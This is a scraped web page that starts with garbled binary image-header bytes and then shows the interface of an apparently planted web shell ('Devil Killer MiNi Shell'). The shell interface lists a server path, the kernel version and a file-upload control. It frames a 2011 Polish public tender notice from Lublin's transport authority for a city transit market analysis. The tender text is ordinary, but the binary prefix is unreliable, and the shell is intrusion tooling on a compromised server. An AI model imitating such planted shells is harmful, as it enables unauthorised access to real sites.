JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110308/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110308/38814-N-2011.html

<p class="kh_header"><b>Lublin: Analiza rynku komunikacji miejskiej w Lublinie wraz z optymalizacją oferty przewozowej na podstawie przeprowadzonych badań rynku komunikacji miejskiej</b><br>
<b>Numer ogłoszenia: 38814 - 2011; data zamieszczenia: 08.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Transportu Miejskiego w Lublinie , ul. Kraśnicka 25, 20-718 Lublin, woj. lubelskie, tel. 0-81 466 29 00, faks 0-81 466 29 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> ztm.bip.lublin.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gminna jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Analiza rynku komunikacji miejskiej w Lublinie wraz z optymalizacją oferty przewozowej na podstawie przeprowadzonych badań rynku komunikacji miejskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem postępowania o udzielenie zamówienia publicznego jest wykonanie opracowania: Analiza rynku komunikacji miejskiej w Lublinie wraz z optymalizacją oferty przewozowej, na podstawie przeprowadzanych badań rynku komunikacji miejskiej, zwanego dalej Opracowaniem, zgodnie z poniższą specyfikacją:

Część 1 Opracowania- Opracowanie wyników badań i analiza rynku komunikacji miejskiej 
w Lublinie.

1.	Przedmiot prac:
Przedmiotem opracowania jest przetworzenie oraz zinterpretowanie danych będących w posiadaniu zamawiającego, pochodzących z przeprowadzanych badań rynku komunikacji miejskiej w Lublinie w zakresie:
-  potoków pasażerskich (napełnień pojazdów),
- więźby ruchu pasażerskiego (kierunków przemieszczania się pasażerów pomiędzy  rejonami komunikacyjnymi),
-  struktury pasażerów (struktury rodzajowej biletów),
-  preferencji i satysfakcji pasażerów (jakości komunikacji),
oraz przedstawienie na podstawie tych danych analizy rynku komunikacji miejskiej 
w Lublinie, w szczególności przez:
1)	określenie wielkości popytu na usługi komunikacji miejskiej, poprzez:
- przedstawienie w postaci tabelarycznej liczby pasażerów na poszczególnych: liniach komunikacyjnych, kursach, przystankach oraz w przeliczeniu na kilometr, w przekroju poszczególnych kursów - osobno dla dnia powszedniego, soboty i niedzieli,
- przedstawienie średniomiesięcznej liczby pasażerów dla poszczególnych linii komunikacyjnych oraz określenie średniomiesięcznej liczby pasażerów 
w przeliczeniu na kilometr dla każdej z linii komunikacyjnych,
- opracowanie mapy potoków pasażerskich - oddzielnie dla dnia powszedniego, soboty i niedzieli,
2)	określenie kierunków popytu na usługi komunikacji miejskiej, w szczególności poprzez:
- przedstawienie w postaci tabelarycznej kierunków przemieszczania się pasażerów pomiędzy rejonami komunikacyjnymi miasta w przekroju dobowym, osobno dla dnia powszedniego, soboty i niedzieli,
- wyszczególnienie największych węzłów przesiadkowych,
- opracowanie mapy więźby podróży, osobno dla dnia powszedniego, soboty 
i niedzieli,
3)	określenie struktury popytu oraz przychodowości w komunikacji miejskiej, poprzez:
- przedstawienie w postaci tabelarycznej struktury pasażerów (struktury rodzajowej biletów) korzystających z komunikacji miejskiej w Lublinie, pod kątem obowiązującej taryfy przewozowej i z uwzględnieniem uprawnień do bezpłatnych i ulgowych przejazdów oraz tzw. gapowiczów,
- obliczenie przychodowości, kosztochłonności i rentowności każdego 
z kursów i każdej linii komunikacyjnej oraz sporządzenie zestawień rentowności dla całej sieci komunikacyjnej, osobno dla dnia powszedniego, soboty, niedzieli 
i przeciętnego miesiąca,
4)	syntetyczne określenie popytu na usługi komunikacyjne pod kątem jakości komunikacji miejskiej, poprzez analizę preferencji komunikacyjnych pasażerów, ze szczególnym uwzględnieniem następujących parametrów: cena przejazdu (biletu), częstotliwość kursowania, regularność kursowania, punktualność kursowania, połączenia bezpośrednie lub dogodność przesiadania się, informacja w pojazdach i na przystankach, warunki podróży w pojazdach i komfort jazdy, warunki oczekiwania na przystankach, bezpieczeństwo podróży,
5)	analizę i ocenę dotychczasowych tras linii komunikacyjnych, rozkładów jazdy, taryfy. 

2.	Źródła opracowania (dane będące w posiadaniu Zamawiającego):
Wykonawca zgodnie z wytycznymi określonymi w pkt. 1, opracuje wyniki (przetworzy dane) badań rynku komunikacji miejskiej w zakresie potoków pasażerskich i więźby ruchu pasażerskiego przeprowadzonych w 2010 r. - opisanych w załączniku nr 8 do s.i.w.z. oraz dokona analizy rynku komunikacji miejskiej 
w Lublinie, na podstawie badań będących w posiadaniu zamawiającego:
1)	w zakresie, o którym mowa w pkt 1 ppkt 1 i ppkt 2: 
a)	obligatoryjnie na podstawie badań potoków pasażerskich i więźby ruchu pasażerskiego przeprowadzonych  w 2010 r.
b)	uzupełniająco (w zakresie nieujętym w ppkt 1 lit. a) na podstawie opracowania: Sytuacja eksploatacyjno-ekonomiczna linii podmiejskich ZTM w Lublinie(2009 2010 r.) - opis opracowania w załączniku nr 9 do s.i.w.z., 
c)	uzupełniająco (w zakresie nieujętym w ppkt 1 lit. a i lit. b) na podstawie pozostałych badań wyszczególnionych w załączniku nr 9 do s.i.w.z.,
d)	na podstawie dokumentów i danych przekazanych przez zamawiającego (np.: badania przeprowadzone przez zamawiającego we własnym zakresie).
2)	w zakresie, o którym mowa w pkt 1 ppkt 3 i ppkt 4:
a)	na podstawie badań wyszczególnionych w załączniku nr 9 do s.i.w.z.,
b)	na podstawie badań przeprowadzonych w 2010 r.,
c)	na podstawie dokumentów i danych przekazanych przez zamawiającego (badania przeprowadzone przez zamawiającego we własnym zakresie, zestawienia sprzedaży biletów, wpływy z biletów, itp.).
Źródła opracowania, o których mowa w pkt. 2, zamawiający przekaże wykonawcy 
w formie elektronicznej (wypełnione kwestionariusze badań, wyniki opracowanych badań).

Część 2 Opracowania- Przejściowa i docelowa koncepcja optymalizacji oferty przewozowej 
w komunikacji miejskiej w Lublinie.
1.	Przedmiot prac:
1)	Przedstawienie koncepcji przejściowej, uwzględniającej obecny układ komunikacyjny oraz ukierunkowanej na planowaną rozbudowę sieci trakcji trolejbusowej, planowaną do zrealizowania do połowy 2014 r.:
a)	propozycje nowych linii komunikacyjnych lub zmian tras istniejących linii komunikacyjnych (opisy i schematy tras przebiegu linii), osobno dla linii autobusowych i trolejbusowych wraz z dokładną analizą uzasadniającą potrzebę realizacji proponowanych zmian, 
b)	określenie optymalnej liczby pojazdów w ruchu dla całej sieci 
i poszczególnych linii komunikacyjnych, z określeniem przydziału taboru,
c)	opracowanie wytycznych do rozkładów jazdy na poszczególnych liniach komunikacyjnych, zawierających w szczególności: optymalne w określonych porach doby częstotliwości kursowania pojazdów na poszczególnych liniach 
(w dzień powszedni, w sobotę i w niedzielę), optymalne czasy przejazdu dla poszczególnych linii w przedziałach czasowych, 
d)	prognoza wykonania pracy przewozowej w wozokilometrach.
2)	Aktualizacja i dostosowanie koncepcji przejściowej do przekazanych przez zamawiającego aktualizowanych harmonogramów oddawania do użytku sieci trakcyjnej przy uwzględnieniu uwag pochodzących z konsultacji społecznych, 
w zakresie określonym w ppkt 1 lit a-d. 
3)	Przedstawienie koncepcji docelowej, uwzględniającej planowaną rozbudowę sieci trakcji trolejbusowej w ramach projektu Zintegrowany System Miejskiego Transportu Publicznego w Lublinie:
a)	propozycje nowego układu komunikacyjnego, osobno dla linii autobusowych 
i trolejbusowych, zgodnie z następującymi wytycznymi i założeniami:
- linie trolejbusowe stanowić będą zasadniczy układ komunikacji miejskiej, 
o określonej częstotliwości kursowania,
-  kategoryzacja linii komunikacyjnych, ze względu na ich znaczenie w obsłudze miasta oraz częstotliwość funkcjonowania - należy wyróżnić 4 poziomy tj. linie: priorytetowe, podstawowe, uzupełniające i marginalne,
-  rozważenie (w zależności od wyników badań potoków pasażerskich) utworzenia jednej lub kilku linii trolejbusowych priorytetowych o interwale modułowym 
w szczycie nieprzekraczającym 7,5 min. (rozumiane jako 7-8 min.),
- zaproponowanie układu trolejbusowych i autobusowych linii podstawowych, 
o interwałach od 7,5 min. (rozumiane jako 7-8 min.) do 15 minut, stanowiącego podstawę systemu komunikacji miejskiej w Lublinie,
- pozostałe linie komunikacyjne (w tym linie podmiejskie) powinny stanowić układ linii uzupełniających i marginalnych, którego funkcją jest obsługa pasażerska do linii priorytetowych i podstawowych oraz pokrycie zapotrzebowania na kursy specjalne tj. realizujące zadania uzasadnione społecznie,
- układ linii komunikacyjnych powinien być oparty na trasach o niewielkiej wariantowości,
- przy budowie układu linii komunikacyjnych należy wziąć pod uwagę historycznie ukształtowany układ linii komunikacyjnych (nazewnictwo linii, przyzwyczajenia pasażerów). 
b)	opracowanie wytycznych do konstrukcji rozkładów jazdy na poszczególnych liniach komunikacyjnych, zawierających w szczególności: optymalne  
w określonych porach doby częstotliwości kursowania pojazdów na poszczególnych liniach (w dzień powszedni, w sobotę i w niedzielę), optymalne czasy przejazdu dla poszczególnych linii w przedziałach czasowych, przy uwzględnieniu następujących założeń:
- układ rozkładów jazdy trolejbusów, co do zasady modułowy (w regularnych odstępach czasu dla wspólnych odcinków), 
- wykonawca zaproponuje wielkości interwałów modułowych (częstotliwości) dla głównych  potoków pasażerskich w układzie: 
przed szczytem porannym,
w szczycie porannym,
w okresie międzyszczytowym,
w szczycie popołudniowym,
w okresie wieczornym poszczytowym,
w okresie późnowieczornym,
w uzasadnionych przypadkach wykonawca przedstawi (zdefiniuje inny rozkład szczytów występujących w komunikacji miejskiej w Lublinie),
- koordynacja rozkładów jazdy powinna być zaprojektowana wieloaspektowo:
linie priorytetowe i podstawowe skoordynowane w obszarze centrum miasta,
rytmiczne rozłożenie odjazdów pojazdów różnych linii (koordynacja) na wspólnie obsługiwanych przez wiązki linii ciągach komunikacyjnych oraz na peryferyjnych przystankach końcowych,
- uwzględnienie przy opracowywaniu wytycznych do rozkładów jazdy 
  zmienności czasów przejazdów w ciągu dnia, 
- zaproponowane rozwiązania muszą być kompatybilne z oprogramowaniem posiadanym przez zamawiającego (program BusMan 100 firmy AGC, zakładający pory pionowe liczenia zmienności czasów przejazdów), 
c)	określenie optymalnej ilości pojazdów w ruchu dla całej sieci i poszczególnych linii komunikacyjnych, z określeniem przydziału taboru,
d)	prognoza wykonania pracy przewozowej w wozokilometrach,

2.	Źródła opracowania, wytyczne i konsultacje społeczne:
1)	Wykonawca przedstawi koncepcje optymalizacji rynku lubelskiej komunikacji miejskiej, o których mowa w pkt 1, w oparciu o wyniki analizy stanowiącej  Część 1 Opracowania wraz z uwzględnieniem dokumentów przekazanych przez Zamawiającego, określających: 
a)	planowaną rozbudowę trakcji trolejbusowej z uwzględnieniem harmonogramów oddawania do użytku poszczególnych odcinków trakcji trolejbusowej - załącznik nr 10 do s.i.w.z.
b)	inne dane określające rynek komunikacji miejskiej (dokumenty: planistyczne, statystyczne, itp.). 
2)	Wytyczne do rozkładów jazdy Wykonawca zobowiązany jest przedstawić 
z uwzględnieniem uwag dokonanych przez Zamawiającego, w szczególności pochodzących z prac roboczych zespołów, w których uczestniczy zamawiający oraz wnioskowanych przez organizacje i instytucje społeczne.
3)	Przed przedstawieniem koncepcji komunikacyjnych, o których mowa w pkt 1, wykonawca zobowiązany jest przeprowadzić konsultacje społeczne (publiczne przedstawienie założeń, dyskusja, modyfikacja koncepcji):
- wykonawca zobowiązany jest do przeprowadzenia co najmniej trzech konsultacji społecznych z:
ośrodkami decyzyjnymi Gminy Lublin (władze miasta, komisje rady miasta),
radami dzielnic, 
innymi podmiotami z otoczenia transportu (miłośnicy komunikacji, zainteresowane organizacje i stowarzyszenia), 
- zamawiający zastrzega, że określone przez niego rozwiązania (przedstawiane 
w toku konsultacji społecznych) wykonawca zobowiązany jest uwzględnić 
w opracowaniu).
4)	Opracowanie powinno być zgodne z ustawą z dnia 16 grudnia 2010 r. o publicznym transporcie zbiorowym (Dz.U z 2011 r. Nr 5, poz. 13), a w szczególności z zapisami Rozdziału 2. Plan zrównoważonego rozwoju publicznego transportu zbiorowego, tym samym powinno stanowić materiał który będzie wykorzystany do opracowania Planu transportowego na terenie Gminy Lublin. Opracowanie powinno być również spójne z Zintegrowanym Systemem  Miejskiego Transportu Publicznego w Lublinie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 63.71.27.10-3, 79.31.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. 	Składający ofertę  winien wnieść wadium przed upływem terminu składania ofert, w wysokości:
1.1. 1 000,00 zł (słownie: jeden tysiąc złotych 00/100) 
2. Wadium może być wnoszone w następujących formach: pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (DZ.U. Nr 109, poz. 1158, z późn. zm.)
3. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy zamawiającego: Bank Pekao S.A., V O. w Lublinie, ul. Królewska 1, Lublin, nr: 71 1240 1503 1111 0010 2200 3156 z dopiskiem WADIUM: analiza, Nr sprawy: DZ.381-1-2/11. Za termin  wniesienia wadium przyjmuje się datę uznania rachunku zamawiającego.
4. W przypadku wniesienia wadium w formie gwarancji lub poręczenia oryginał dokumentu należy złożyć w Zarządzie Transportu Miejskiego w Lublinie, Al. Kraśnicka 25, 20-718 Lublin, pok. 211 przed upływem terminu składania ofert.
5. Wadium wniesione w formie gwarancji ubezpieczeniowej lub bankowej będzie akceptowane pod warunkiem, że jest zgodne z ustawą z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, a w szczególności:
5.1.    gwarancja będzie zawierała wszystkie przypadki utraty wadium przez wykonawcę określone w art. 46 ust. 4a i ust. 5 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych,
5.2.   okres ważności gwarancji będzie nie krótszy niż okres związania ofertą określony w specyfikacji istotnych warunków zamówienia.
6.  Wadium wniesione w formie poręczenia bankowego, poręczenia spółdzielczej kasy oszczędnościowo- kredytowej lub poręczenia udzielonego przez podmiot, o którym mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości będzie akceptowane pod warunkiem, że jest zgodne z ustawą z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, a w szczególności:
6.1.     poręczenie będzie zawierało wszystkie przypadki utraty wadium przez wykonawcę określone w art. 46 ust. 4a i ust. 5 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych,
6.2.   poręczenie będzie zawierało określony datą termin odpowiedzialności, nie krótszy niż okres związania ofertą określony w specyfikacji istotnych warunków zamówienia.
7. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia  z treści dokumentu wadium, wnoszonego w formie gwarancji lub poręczenia winno jednoznacznie wynikać, że gwarancja lub poręczenie zostało udzielone wszystkim podmiotom składającym ofertę wspólną. 
8. Zamawiający zatrzymuje wadium na podst. art. 46 ust 4a i ust. 5 ustawy Pzp.
9. Zamawiający zwraca  wadium zgodnie z art. 46 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykażą wykonanie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, minimum 5 wdrożeń koncepcji optymalizacji podaży usług transportu publicznego, w tym min. 1 w mieście powyżej 100 tys. mieszkańców.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1 Oświadczenie, że  wykonawca, spełnia warunki udziału w postępowaniu wg Załącznika nr 2 do s.i.w.z., dotyczące:
1.1.  posiadania uprawnień do wykonywania działalności w zakresie objętym przedmiotem zamówienia, jeżeli przepisy nakładają obowiązek posiadania takich uprawnień,
1.2.     posiadania wiedzy i doświadczenia,
1.3.   dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
1.4.    sytuacji ekonomicznej i finansowej.
2. Prawidłowo wypełniony Formularz oferty  (wg Załącznika nr 1 do s.i.w.z.). W przypadku składania oferty przez podmioty występujące wspólnie należy podać nazwy (firmy) oraz dokładne adresy wszystkich wykonawców składających ofertę wspólną.
